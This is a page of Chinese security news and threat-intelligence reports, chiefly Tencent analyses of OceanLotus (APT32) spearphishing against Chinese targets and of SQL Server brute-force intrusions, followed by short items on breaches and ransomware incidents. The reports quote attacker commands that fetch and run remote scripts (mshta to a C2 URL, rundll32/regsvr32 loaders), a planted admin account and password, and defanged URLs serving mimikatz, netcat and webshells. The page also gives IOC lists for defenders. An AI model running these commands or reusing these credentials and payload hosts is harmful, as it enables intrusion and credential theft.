标签: 黑客攻击

“海莲花”(OceanLotus) 2019 年针对中国攻击活动汇总

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/OA09fndsHfpLVxeo7DnjYg   一、概述 “海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国大陆的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动最活跃的APT攻击组织,甚至没有之一。 腾讯安全御见威胁情报中心曾在2019年上半年发布过海莲花组织2019年第一季度攻击活动报告,在报告发布之后一直到现在,我们监测到该组织针对中国大陆的攻击持续活跃。该组织的攻击目标众多且广泛,包括中国大陆的政府部门、海事机构、外交机构、大型国企、科研机构以及部分重要的私营企业等。并且我们监测到,有大量的国内目标被该组织攻击而整个内网都沦陷,且有大量的机密资料、企业服务器配置信息等被打包窃取。 此外我们发现,该组织攻击人员非常熟悉我国,对我国的时事、新闻热点、政府结构等都非常熟悉,如刚出个税改革时候,就立马使用个税改革方案做为攻击诱饵主题。此外钓鱼主题还包括绩效、薪酬、工作报告、总结报告等。 而从攻击的手法上看,相对第一季度变化不是太大,但有一些小的改进,包括攻击诱饵的种类、payload加载、绕过安全检测等方面。而从整体攻击方式来看,依然采用电子邮件投递诱饵的方式,一旦获得一台机器的控制权后,立即对整个内网进行扫描和平移渗透攻击等。这也进一步说明了APT攻击活动不会因为被曝光而停止或者有所减弱,只要攻击目标存在价值,攻击会越来越猛烈,对抗也会越来越激烈。 有关海莲花APT组织2019年对中国大陆攻击情况的完整技术报告,请参考: https://pc1.gtimg.com/softmgr/files/apt32_report_2019.pdf 二、攻击特点 2.1  钓鱼邮件的迷惑性 海莲花组织擅长使用鱼叉攻击,通过大量精准发送钓鱼邮件来投递恶意附件的方式进行攻击。整个2019年,持续对多个目标不断的进行攻击,如下列钓鱼邮件: 从邮件主题来看,大部分邮件主题都非常本土化,以及贴近时事热点。邮件主题包括: 《定-关于报送2019年度经营业绩考核目标建议材料的报告》、《组织部干部四处最新通知更新》、《关于2019下半年增加工资实施方案的请示(待审)》、《2019年工作报告提纲2(第四稿)》、《2019年5月标准干部培训课程通知》等等。 我们在2019年第一季度的报告中还提到海莲花组织采用敏感内容主题钓鱼邮件,不过在之后的攻击中并未再次发现使用该类型诱饵: 此外,投递钓鱼邮件的账号均为网易邮箱,包括126邮箱和163邮箱,账号样式为:名字拼音+数字@163(126).com,如: Sun**@126.com、yang**@126.com、chen**@126.com、zhao**@163.com、reny**@163.com等。 2.2  诱饵类型的多样化 海莲花组织所使用的诱饵类型众多,能想到的诱饵类型海莲花几乎都用过。除了我们在第一季度报告里提到的白加黑、lnk、doc文档、WinRAR ACE漏洞(CVE-2018-20250)的压缩包等类型外,之后的攻击中还新增了伪装为word图标的可执行文件、chm文件等。 可执行文件诱饵: Chm诱饵: 白加黑诱饵: 带有宏的恶意office文档: 恶意lnk: 带有WinRAR ACE(CVE-2018-20250)漏洞的压缩包: 2.3  载荷执行方式多变 由于诱饵的多样化,载荷执行的方式也多变。此外第二阶段的加载方式同样方式众多。 1、 直接执行可执行文件 如该诱饵,伪装为word图标的可执行文件,并在文件描述里修改成了Microsoft DOCX,用于迷糊被钓鱼者。执行恶意文件后,会释放诱饵文档2019年5月标准干部培训课程通知.docx,并且打开,让受害者以为打开的就是word文档。而打开后的文档为模糊处理的文档,诱使受害者启用文档中的宏代码以查看文档内容,实际上启用宏之后,仍然看不到正常的内容: 2、 使用rundll32加载恶意dll 如某诱饵在执行后,会在C:\Users\Administrator\AppData\Local\Microsoft目录释放真正的恶意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll,然后使用rundll32来执行该dll:”C:\Windows\system32\rundll32.exe” “C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll”,Register 3、 宏 使用宏来执行载荷,且宏代码经过的混淆处理: 4、 Office内存执行恶意shellcode 使用宏代码,在office中直接解密shellcode,在内存中创建线程执行: 5、 dll侧加载(白加黑) 使用dll侧加载(DLL Side-Loading)技术来执行载荷,通俗的讲就是我们常说的白加黑执行。 其中所使用的宿主文件对包括: 白文件原名 黑dll文件名 iTunesHelper.exe AppVersions.dll SGTool.exe Inetmib1.dll Rar.exe ldvptask.ocx GoogleUpdate.exe goopdate.dll 360se.exe chrome_elf.dll Winword.exe wwlib.dll rekeywiz.exe mpr.dll wps.exe krpt.dll wechat.exe WeChatWin.dll 6、 通过com技术执行 通过com技术,把某恶意dll注册为系统组建来执行: 7、 Chm内嵌脚本 Chm执行后,会提示执行ActiveX代码: 其脚本内容为: 不过由于编码处理的问题,该chm打开后为乱码: 而通过手动解压后,原始内容如下: 8、 使用计划任务进行持久性攻击 如上面的chm诱饵执行后,会在%AppData%\Roaming下释放文件bcdsrv.dll,然后创建名为MonthlyMaintenance的计划任务: 命令行为:C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll bcdsrv.dll为真正的恶意文件。 9、 lnk调用mstha执行 该方法的详细分析在之前的《海莲花2019年第一季度攻击披露》: 执行lnk后,会调用命令:C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html,而news.html实际为一个vbs脚本文件。 10、 使用odbcconf.exe加载文件: odbcconf.exe为系统自带的一个文件,该文件可以用来执行dll文件,而由于宿主进程为系统文件,因此可以逃避一些安全软件的拦截: 11、WinRAR ACE(CVE-2018-20250)漏洞 带有该漏洞的压缩包,可以构造为:解压后除了会解压出正常的文件外,再在启动目录(C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)释放一个自解压文件: 该文件为一个自解压程序,等启动后,会释放一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件,然后执行命令regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx执行: 2.4  多重载荷攻击 我们在最新的攻击活动中,我们首次发现海莲花使用了多重载荷的攻击。 之前的攻击活动中,都是解密shellcode后,就直接执行最终的RAT,如: 而在最新的攻击活动中,我们发现,解密shellcode后,会先下载shellcode执行,如果下载不成功,再来加载预先设定好的RAT: 这样使得攻击活动更加的丰富和多样性,并且也可控。 2.5  与安全软件对抗激烈 海莲花也采用了多种对抗安全软件的方式,主要为: 1、 dll的侧加载(白加黑) 该技术上面已详细描述,这里不再赘述。 2、 使用系统文件来执行: 如odbcconf.exe 3、 Office中直接内存执行shellcode 上文也已经描述,这里也不再展开。 4、 添加垃圾数据以扩充文件大小 为了防止该文件被安全厂商收集,海莲花组织特意在某些文件的资源中添加大量的垃圾数据的方式以扩充文件大小。 如某文件,填充垃圾数据后,文件大小高达61.4 MB (64,480,256 字节): 5、 每台机器的第二阶段后门都是定制的 每台机器的第二阶段后门文件都是根据当前机器的机器属性(如机器名)来加密定制的,因此每台机器上的文件hash都是不一样,且没这台机器的相关信息则无法解密。因此且即便被安全厂商捕捉,只要没有这台机器的相关遥感数据就无法解密出真正的payload。详细的见后文的”定制化后门”部分。 6、 通信的伪装 如某次攻击中C2的伪装:根据配置信息,可进行不同的连接和伪装,对C2进行拼装后再进行解析。拼接方式为(xxx为配置C2): {rand}.xxx www6.xxx cdn.xxx api.xxx HTTP Header的伪装: 2.6  定制化的后门 使用定制化的后门(主要是第二阶段下发的后门),海莲花组织在2019年所使用的技术中最令人印象深刻的。该技术我们曾经在《2019年海莲花第一季度攻击报告》中首次曝光:针对每台机器下发的恶意文件,都使用被下发机器的相关机器属性(如机器名)进行加密,而执行则需要该部分信息,否则无法解密。因此每个下发的恶意文件都不一样,而且即便被安全厂商捕捉,只要没有该机器的相关遥感数据就无法解密出真正的payload。 该后门最终使用白加黑的方式来执行,包括AdobeUpdate.exe+goopdate.dll、KuGouUpdate.exe+goopdate.dll、 XGFileCheck.exe + goopdate.dll、SogouCloud.exe+ inetmib1.dll等组合来执行。 加密流程为: 可以看到,某次针对国家某单位的攻击中,使用的密钥为: 而该受害的用户名为Cao**,可见该木马只专门为了感染该电脑而特意生成的。 2.7  多种恶意软件的选择 从我们的长期跟踪结果来看,海莲花组织使用最终的恶意软件(无论是第一阶段后门还是第二阶段后门)主要有三种,分别是CobaltStrike的beacon木马、Denis家族木马、修改版的Gh0st。其中CobaltStrike和Denis使用的最多,而修改版的Gh0st则比较少见。 CobaltStrike: Denis: 修改版Gh0st: 2.8  持续的内网渗透 通过钓鱼攻击攻陷一台主机后,海莲花还会不断对被攻击的内网进行渗透攻击活动,以此来渗透到更多的内网机器: 扫描: 获取hash: 打包文件: 此外,还会还会通过powershell,创建计划任务来下载持久化的工具: 最终的恶意文件为goopdate.dll,跟上文所述的第二阶段下发后门一致。 三、可能存在的假旗活动 在跟踪海莲花的过程中,我们还发现了一些跟海莲花活动类似的攻击: 如: 可以看出该批活动跟海莲花的类似:如关键字、使用白加黑等。 而该文件最终的执行的恶意代码为两种: 一种是CobaltStrike生成的Beacon payload; 另一种是metasploit生成的block_reverse_http的paylaod。 虽然CobaltStrike的Beacon木马海莲花组织一直在进行使用,但是之前未发现有metasploit生成的payload,这似乎跟之前的海莲花攻击活动又有些不一致。 此外该批活动的c2都在中国境内(包括中国香港),这似乎跟之前的攻击活动也不大一样: 虽然这波活动在极力模仿海莲花的一些攻击行为,但是也依然存在不同的地方。因此暂未有更多的证据可以表明该活动归属于海莲花还是其他组织使用的假旗(false flag)活动。因此在这先不做定论,等待更多的证据和关联的依据。 四、总结 海莲花组织是近年来针对中国大陆的敏感部门进行攻击最活跃的APT组织,甚至没有之一。当然该组织也是被安全公司曝光的针对中国大陆攻击活动报告最多的APT攻击组织。尽管被安全厂商频繁曝光,该组织并未有停手迹象,反而不断更新其技术和武器库,包括诱饵、payload、新的漏洞利用等,此外也有众多跟杀软的对抗手段,如自增文件大小、混淆方式、定制化的payload等。 因此我们提醒相关部门和相关人员,切记提高安全意识,不要随意执行来历不明的邮件的附件,不要被钓鱼信息所蒙蔽。 五、安全建议 1、 提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码; 2、 及时安装操作系统补丁和Office等重要软件的补丁; 3、 使用杀毒软件防御可能得病毒木马攻击,对于企业用户,推荐使用腾讯御点终端安全管理系统。腾讯御点内置全网漏洞修复和病毒防御功能,可帮助企业用户降低病毒木马入侵风险; 4、 推荐企业用户部署腾讯御界高级威胁检测系统及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 六、附录 6.1  腾讯御见威胁情报中心 腾讯御见威胁情报中心,是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托腾讯安全在海量安全大数据上的优势,通过机器学习、顶尖安全专家团队支撑等方法,产生包括高级持续性攻击(APT)在内的大量安全威胁情报,帮助安全分析人员快速、准确对可疑事件进行预警、溯源分析。 腾讯御见威胁情报中心公众号自开号以来,发布了大量的威胁分析报告,包括不定期公开的针对中国大陆目标的APT攻击报告,无论是分析报告的数量上还是分析报告的质量上,都处于业界领先水平,受到了大量客户和安全专家的好评,同时发布的情报也经常被政府机关做为安全预警进行公告。 以下是腾讯御见威胁情报中心公众号的二维码,关注请扫描二维码: 6.2  IOCs MD5: e7920ac10815428de937f2fca076b94c 4095b9682af13ca1e897ca9cc097ec69 b96de3d0023542f8624b82b9773373e9 5c5f8c80dcb3283afeb092cb0c13a58a c90c7abcee1d98a8663904d739185d16 d249411f003d05c0cea012c11ba13716 3489140891e67807c550aa91c67dc4ad 22f8736bbc96c1a58ab07326d730a235 dade969b00cbc4a0c1b58eeb0e740b63 3c3b2cc9ff5d7030fb01496510ac75f2 d604c33d6ec99a87a672b3202cb60fa7 861fc5624fd1920e9d9cc7a236817dd7 8e2b5b95980cf52e99acfa95f5e1570b 3c8b2d20e428f8207b4324bb58f5d228 a81424e973b310edd50aed37590f4b8a cf5d6d28c388edf58e55412983cf804a 6b8bec74620fbf88263b48c5a11b682e 9eb55481a0b5fcd255c8fb8de1042f88 5c00063b11c4710fe5a5a1adaf208b12 d30bc57624d233d94dc53a62908ef2df 886d0dd67e4cf132a1aed84263d661e3 2b3c5c831eb6b921ac128c4d44d70a7a 1dfb41e5919af80c7d0fa163a90e21e5 C&C: 360skylar.host wechats.asis news.shangrilaexports.com clip.shangweidesign.com jcdn.jsoid.com libjs.inquirerjs.com baidu-search.net sys.genevrebreinl.com ad.ssageevrenue.com tel.caitlynwells.com us.melvillepitcairn.com upgrade.coldriverhardware.com cdnwebmedia.com 43.251.100.20 43.254.217.67 114.118.80.233 6.3  MITRE ATT&CK Tactic ID Name Initial Access T1193 Spearphishing Attachment Execution T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1085 Rundll32 T1204 User Execution T1223 Compiled HTML File T1053 Scheduled Task T1117 Regsvr32 Persistence T1179 Hooking T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder Defense Evasion T1107 File Deletion T1140 Deobfuscate/Decode Files or Information T1036 Masquerading T1112 Modify Registry T1027 Obfuscated Files or Information T1085 Rundll32 T1099 Timestomp T1117 Regsvr32 Credential Access T1179 Hooking T1056 Input Capture Discovery T1083 File and Directory Discovery T1046 Network Service Scanning T1135 Network Share Discovery T1057 Process Discovery T1082 System Information Discovery T1007 System Service Discovery Lateral Movement T1534 Internal Spearphishing Collection T1005 Data from Local System T1025 Data from Removable Media T1123 Audio Capture T1056 Input Capture T1113 Screen Capture T1115 Clipboard Data Command and Control T1043 Commonly Used Port T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1001 Data Obfuscation T1065 Uncommonly Used Port 6.4  参考链接 https://s.tencent.com/research/report/715.html      

2019 年 Q3 逾 12000 名谷歌用户受政府黑客攻击

据谷歌威胁分析小组(TAG)报道显示:超过90%的目标用户受到“钓鱼邮件”的攻击。这些数据源于 TAG 追踪黑客组织而得出的结论,这些黑客组织通过向立场不同的政客、记者、人权学家发送邮件,来进行情报收集、知识产权窃取、破坏性网络攻击以及传播虚假信息等一系列行为。 谷歌公司表示,2019年7月至9月间发送的高风险用户安全警告与2018年和2017年同期相比浮动范围均在10%以内。 我们鼓励记者、人权学家和政客等高风险用户加入我们的高级保护计划(APP),该计划通过硬件安全密钥,可为防范网络钓鱼和帐户劫持提供最有力的保护。该程序是专门为高风险账户设计的,”谷歌说。 据谷歌共享的地图显示,钓鱼攻击警告虽然已被发送到149个国家受影响的用户手中,但美国、巴基斯坦、韩国和越南是仍受攻击最严重的国家。 自2012年来,一旦发现有黑客通过网络钓鱼、恶意软件等形式攻击用户时,谷歌便会向用户发出安全警报。 就在去年,谷歌开始向 G Suite 管理员提供安全警报,以便他们能更好向用户保护采取行动。 针对安全警报问题,谷歌公司建议当目标用户收到邮件时,不必惊慌,这并不一定意味着你的谷歌账户已经被泄露,这意味着黑客试图通过一些恶意手段访问你的谷歌账户,你应及时采取一些措施如保持其应用程序和软件的最新状态并启用两步验证保护个人账户信息。     消息来源:TheHackerNews, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

勒索软件渗透纽约警察局的指纹数据库 导致系统关闭

据外媒Softpedia报道,在一个承包商连接到网络以配置数字显示器后,勒索软件感染了运行纽约警察局(NYPD)指纹数据库的计算机。该事件发生在2018年10月,导致NYPD在总共23台计算机上发现感染后,关闭了LiveScan指纹跟踪系统。但是,该部门官员声称该感染“从未执行”,这意味着勒索软件没有造成任何损害,但是NYPD出于谨慎考虑而决定使该系统关闭。 NYPD官员在接受《纽约邮报》采访时表示,该软件已重新安装在200台计算机上,并且指纹数据库于第二天早上恢复上线。NYPD负责信息技术的副局长Jessica Tisch表示:“我们想深入了解这一点。对于我们来说,深入了解这一点真的很重要。到周六清晨—我记得它仍然尚未恢复—我们正在使系统上线。” 勒索软件通常会锁定文件的访问权限,直到受害者支付解密密钥的费用为止。当承包商插入他们用来配置数字显示器的NUC微型PC时,该勒索软件便感染了NYPD网络。NYPD表示,他们确实对此事件对承包商提出了质疑,但未给予任何处罚。 此外,NYPD声称其网络中只有约0.1%的计算机受到了影响,而没有任何文件被锁定。该机构尚未共享有关感染背后的黑客团体,勒索软件和操作被感染设备的承包商的详细信息。 然而尽管NYPD已经避免了一场网络噩梦,但该部门网络中潜在的勒索软件感染可能会带来灾难性的影响。NYPD数据库还连接到更大的州级别自动指纹识别系统,该系统拥有大约700万个文件,如果被勒索软件感染可能会被锁定,并且在恢复之前可能将使系统连续数天保持脱机状态。   (稿源:cnBeta,封面源自网络。)

​黑客爆破攻击Sql Server,已控制数百台企业服务器和网站

感谢腾讯御见威胁情报中心来稿! 原文:腾讯御见威胁情报中心 一、概述 SQL爆破、提权攻击已成攻击者惯用伎俩,但仍有部分企业网管使用弱口令导致服务器被黑客操控。近日,腾讯安全御见威胁情报中心发现一起针对SQL数据库的爆破攻击事件,攻击成功后会根据系统环境下发远控木马、植入Webshell、在目标服务器创建管理员用户。本次攻击的失陷服务器已达数百台之多,主要受害者位于陕西、山西、吉林等地。 该木马的攻击行动具有如下特点 木马针对普通windows服务器下发TeamView实施远程控制,监测数据显示该木马已控制数百台服务器; 针对web服务器,木马植入webshell,已知有40多家网站共植入300余个Webshell; 木马会获取中毒主机的一般信息,包括:IP地址、操作系统版本、用户名、CPU、内存、磁盘、安全软件等基本信息,并将这些信息发送到远程服务器; 入侵成功后,会开启服务器的RDP服务(远程桌面服务),且会创建多个具有管理员权限的内置账户,方便远程登录。 二、详细分析 攻击者在HFS上的工具列表 从HFS列表可以看出,该团伙主要通过Mssql&mysql爆破,3389爆破,攻击成功后再利用提权工具进行提权,以mssql爆破工具进行分析 Start.bat启动扫描任务,并根据扫描结果进行爆破 Dhls.exe根据ip.txt中的IP列表扫描主机是否开放sql相关端口,接着使用CSQL.exe尝试爆破,其中user.txt,pass.txt分别是用户名和密码,爆破成功的IP会输出到out.txt中,接着CSQL中会对out.txt中机器进行远程命令执行,sql命令保存在2018.sql Sql命令结束杀软进程 向系统添加账户 SQLuser,sm$sm520 下载并执行team.exe 目前team.exe已经无法下载,无法得知里面具体功能,从攻击者的文件服务器上看,攻击者在爆破成功后会下发TeamView远程控制工具或webshell:hxxp://124.16.146.185:9000/tv.exe,并通过TVGET.exe程序获取到TeamView的用户ID和密码: 如果是web服务器,则会下发Webshell到c:/1.php,c:/1.asp,c:/1.aspx Webshell经过简单加密混淆,base64及字符压缩 解密后联网下载404.gif 404.gif中是一段被加密shell,通过gzinflate&base64_decode解密后可以得到一个完整的反弹木马。 首先会添加一个账户envl到系统中,方便后续远程登录 反弹链接的C2从cookie中获取反弹链接的C2从cookie中获取 在shell中也包含了用于执行mysql语句的shell 木马可对服务器web页面进行批量挂马 木马功能 目前腾讯安全御见威胁情报中心已监测到有40多家网站,300多个页面被植入该后门。 三、关联分析 追溯攻击中使用的webshell来自webshell8.com,号称免杀主流web护盾。 Webshell的界面 在攻击者发现HFS服务器被盯上后,竟在服务器上放置联系方式。 四、解决方案   加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿使用弱口令,特别是sa账号密码,防止黑客暴力破解。 修改SQL Sever服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。 企业用户可在服务器部署腾讯御点终端及时对服务器打补丁,防止这类木马利用windows提权漏洞,从而防范此类攻击。 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html)   腾讯御界检测到服务器遭遇爆破攻击 IOCs IP 124.218.92.68:9000 124.16.146.185:9000 123.15.33.19:9000 Domain phpapi.info tanlini.3322.org MD5 f1c4842de714e7480e69f41540c3626b e7c182ece6eceb6f89d6bd9a6d33c53e 5c0249cce6e5c500a54aa34ba2b8c282 c8a689d353b10ca90e88f3f7b4afa25f 78ff58ad4fe3c40e6f6945a2b0c79f36 a7419cf9e40501cfb2762623c5277857 f1f22dc294694ba7a727ea991f88c3a1 URL hxxp://phpapi.info/404.gif hxxp://123.15.33.19:9000/team.exe hxxp://124.16.146.185:9000/CVE2018.exe hxxp://124.16.146.185:9000/CVE-2018-8120.exe hxxp://124.16.146.185:9000/freeSSHd.exe hxxp://124.16.146.185:9000/go.bat hxxp://124.16.146.185:9000/HAdmin.exe hxxp://124.16.146.185:9000/K8UA.asxp hxxp://124.16.146.185:9000/lcx.exe hxxp://124.16.146.185:9000/mima.ps1 hxxp://124.16.146.185:9000/mimidrv.sys hxxp://124.16.146.185:9000/mimikatz.exe hxxp://124.16.146.185:9000/mimikatz_trunk.zip hxxp://124.16.146.185:9000/mimilib.dll hxxp://124.16.146.185:9000/nc.exe hxxp://124.16.146.185:9000/she.aspx hxxp://124.16.146.185:9000/she.php hxxp://124.16.146.185:9000/shell.asp hxxp://124.16.146.185:9000/task.exe hxxp://124.16.146.185:9000/tcp.exe hxxp://124.16.146.185:9000/team.exe hxxp://124.16.146.185:9000/TV_pweg.exe hxxp://124.16.146.185:9000/TVGET.exe hxxp://124.16.146.185:9000/TVs.exe hxxp://124.16.146.185:9000/wce.exe hxxp://124.16.146.185:9000/Welcome.txt hxxp://124.16.146.185:9000/x.mof hxxp://124.16.146.185:9000/xx.jpg

两名黑客通过 SIM 卡交换攻击窃取 55 万美元加密货币,随后被捕

  今年2月美国首次对 SIM卡交换攻击予以定罪,此后,美国司法部对多人提起诉讼,指控他们从受害者手中窃取数百万美元加密货币。 美国当局于周四从马萨诸塞州逮捕了涉嫌网络犯罪的黑客,并指控他们在2015年11月至2018年5月之间通过SIM卡交换攻击从至少10名受害者中窃取了55万美元的加密货币。 SIM交换或SIM劫持涉及到了移动电话提供商的社交服务。黑客假冒用户身份,要求提供商将电话号码移植到自己的SIM卡上。 一旦成功,攻击者就可以获取目标手机上的一次性密码,验证码和双重验证,以便重置密码并获得对用户的社交媒体,电子邮件,银行和加密货币帐户的访问权限。 黑客还针对加密货币公司的高管 根据起诉书,两名被告Eric Meiggs(20)和Declan Harrington(21)不仅攻击加密货币金额较高的用户,他们还通过攻击加密货币公司高管谋取巨额利润。 除此之外,两名被告还被指控盗取受害者的社交媒体帐户,其中包括两名“具有高价值或’OG’(’黑帮’的俚语)的社交媒体帐户”。 该二人已被控以11项指控,罪名是: ·串谋电汇欺诈 ·八项电汇欺诈罪 ·计算机欺诈和滥用罪 ·严重的身份盗窃罪 如果被判诈骗罪,这两名被告将面临最高20年监禁的处罚。同时,严重的身份盗窃指控最高可判处2年有期徒刑。 如何保护自己免受SIM卡交换攻击 在发生几次“ SIM卡交换”事件之后,美国联邦贸易委员会(FTC)于10月发布了准则列表,用户可以遵循这些准则来保护自己免受SIM交换攻击: 1.不要回复要求个人信息的电话,电子邮件或短信。 2.限制在线共享的个人信息。 3.设置账户PIN或密码。 4.对于具有敏感信息或财务信息的帐户建议使用更强的身份验证。 如果您遭遇了SIM卡交换攻击,可以采取一些抢救措施,例如: 1.立即联系您的服务提供商,举报欺诈行为并重新取回您的电话号码,并且立即更改您的帐户密码。 2.检查您的信用卡,银行和其他金融帐户是否被盗刷,如果发现任何损失,立马向银行报告。   消息来源:TheHackerNews, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

ZoneAlarm论坛遭遇黑客攻击,暴露成千上万用户数据

Check Point Technologies拥有的流行安全软件公司ZonaAlar 遭遇了数据泄露,安全漏洞暴露了ZonaAlarm论坛用户的数据。 ZoneAlarm套件包括面向用户和小型组织的防病毒软件和防火墙解决方案,下载量接近1亿。 虽然ZoneAlarm或者其母公司Check Point都还没有公开这次的事件,但该公司本周末悄悄地通过电子邮件警告了所有用户。 尚不清楚攻击者何时破坏了ZoneAlarm论坛。消息表明,攻击者获得了对论坛成员数据的未经授权的访问,包括姓名,电子邮件地址,哈希密码和生日。 好消息是,受影响的用户数量不大,此事件仅影响了“ forums.zonealarm.com”域,该域名下大约有4,500个订阅者。 “该论坛与公司的其他网站不同,只有少数的用户注册使用,”公司在通知邮件中解释道,“目前该网站为了解决问题而处于非活动状态,并将在修复后立即恢复。登录论坛后,系统将要求您重置密码。” 此次事件是由于缺少补丁程序管理所致。公司发言人解释说,攻击者利用了vBulletin论坛软件中的CVE-2019-16759远程执行代码漏洞。 9月,一位匿名黑客披露了技术细节和概念验证漏洞利用代码,以解决该漏洞中一个严重的零日远程代码执行漏洞。黑客可以远程利用此漏洞。黑客发布 的PoC对于5.0.0至5.5.4版本都有效,ZoneAlarm论坛正在运行5.4.4版本。 论坛软件的小部件文件在通过URL参数接受配置的方式中产生了零日漏洞。专家发现该软件包无法验证参数,攻击者可以利用该软件包注入命令,并在易受攻击的安装上远程执行代码。 此事件发生后,ZoneAlarm 关闭了论坛网站并开始对事件进行调查。   消息来源:TheHackerNews, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

墨西哥国有石油公司 Pemex 遭遇勒索软件打击

周日,DoppelPaymer勒索软件感染并破坏了墨西哥国有石油公司 PetróleosMexicanos(Pemex)的系统。 黑客向Pemex提出的金额为565 比特币。 此外,DoppelPaymer的TOR网站更新后的文字如下: “我们还收集了所有的私人敏感数据。如果你拒绝付款,我们会将这些数据传播给其他人,这可能会损害您的商誉。” pic.twitter.com/BoHi1lVigF — MalwareHunterTeam(@malwrhunterteam),2019年11月12日 据该公司称,公司只有不到5%的计算机感染了勒索软件。 图片来自BleepingComputer “和其他国际政府以及金融公司和机构一样,Pemex 经常收到威胁和网络攻击。” 该公司发布的安全公告中写道。“11月10日星期日,这家国有生产公司遭遇了网络攻击,这些攻击最终被及时消除,并且只影响了不到5%的个人计算机设备的运行。此次事件过后,Pemex重申其燃料生产,供应和库存是有安全保障的。” Petróleos Mexicanos 声称它迅速解决了此事件,同时强调其运营和生产系统没有受到影响。 Pemex确认其基础设施与所有主要的国家和国际政府以及金融组织一样,正不断面对来自黑客的攻击,因此公司正在持续加强安全措施。 DoppelPaymer勒索软件是BitPaymer勒索软件的 forked 版本,它可能是由某些网络犯罪团伙以TA505身份开发的。   消息来源:ZDNet, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

窃取 Capital One 约1亿数据的黑客暂被释放

Capital One黑客Paige Thompson在等待审判期间于周二从联邦拘留所释放。 Thompson 从Capital One盗窃1.06亿张记录,此前曾在8月份要求释放联邦拘留所,但最初由于当时法官认为她有飞行危险而被拒绝。 但是,在本周一,主审法官援引汤普森的观点,认为Thompson没有对社区或她本人构成足够的威胁,所以她不应该在等待审判期间受到监禁。Thompson希望获得释放,因为她认为作为一个被关押在男子监狱的变性人,她可能会患上抑郁症或伤害自己。 作为释放条件的一部分,美国地方法院法官Robert Lasnik命令Thompson移居到联邦中途房屋。在那里,Thompson 将一直受到GPS监控,将被禁止访问互联网或使用计算机,手机或任何其他电子设备,除非获得法院许可。 Thompson引起的数据泄露事件影响了美国1亿人和加拿大600万人。据Capital One称被盗取的是2005年至2019年之间的数据,与消费者向银行申请信用卡时所提供的信息有关。其中包括大约一百万个加拿大社会保险号,14万个美国社会保险号和8万个银行帐号。 美国检察官还指控Thompson窃取了其他30多家公司的数据。 据美国检察官说:“服务器是在Thompson的卧室中查获的,其中不仅包括从首都一号偷走的数据,还包括从其他30多家公司,教育机构和其他产业盗取的多达几TB的数据。” Thompson于7月被捕,目前正面临有关电汇欺诈和网络欺诈等起诉。 她的审判定于明年三月进行。   消息来源:ZDNet, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

西班牙两家公司同天遭勒索软件攻击,引发 WannaCry 级恐慌

近日,西班牙两家大型公司在同一天内受到勒索软件打击。 其中一家是Everis,这是NTT Data Group旗下的IT咨询公司,其发言人目前还没有发表正式声明。第二个是西班牙最大的无线电网络公司Cadena SER,其在官网发表了声明,确认公司遭遇了攻击。 两家公司都要求员工关闭计算机,并断开网络连接。 Everis在18个国家/地区拥有超过24,500名员工,是受影响最大的公司之一。该公司其他分支也受到了影响,勒索软件已通过公司的内部网络传播。 疑似有Everis员工在社交媒体上发布了截图,显示勒索软件 BitPaymer 攻击了 IT 公司,该勒索软件也袭击了法国电视台M6和德国自动化工具制造商Pilz。尚未公布攻击 Cadena SER 的勒索软件。 图片:Alex Barredo(Twitter@somospostpc) 西班牙当局立即作出反应 由于西班牙是早期遭受WannaCry重创的国家之一,因此这一次政府组织迅速做出了反应。 西班牙国家安全局在事件发生后的数小时内发布安全建议,敦促公司改善网络安全措施,并且建议其他受害者向西班牙国家网络安全研究所INCIBE寻求帮助。 尽管没有类似WannaCry的勒索软件爆发的迹象,但这两次勒索软件感染对西班牙当地的商业环境产生了重大影响。许多本地公司使用Everis软件进行日常活动,有人担心自己被感染,选择关闭程序来检查系统。 网上还出现了谣言,有人猜测除了Everis之外,其他IT公司也受到了影响。金融咨询公司毕马威(KPMG)的西班牙支部和软件巨头埃森哲(Accenture)今天早些时候在Twitter上发布声明,告诉用户他们没有受到感染,并且一切正常。   消息来源:ZDNet, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

警惕来自节假日的祝福:APT 攻击组织”黑格莎(Higaisa)”攻击活动披露

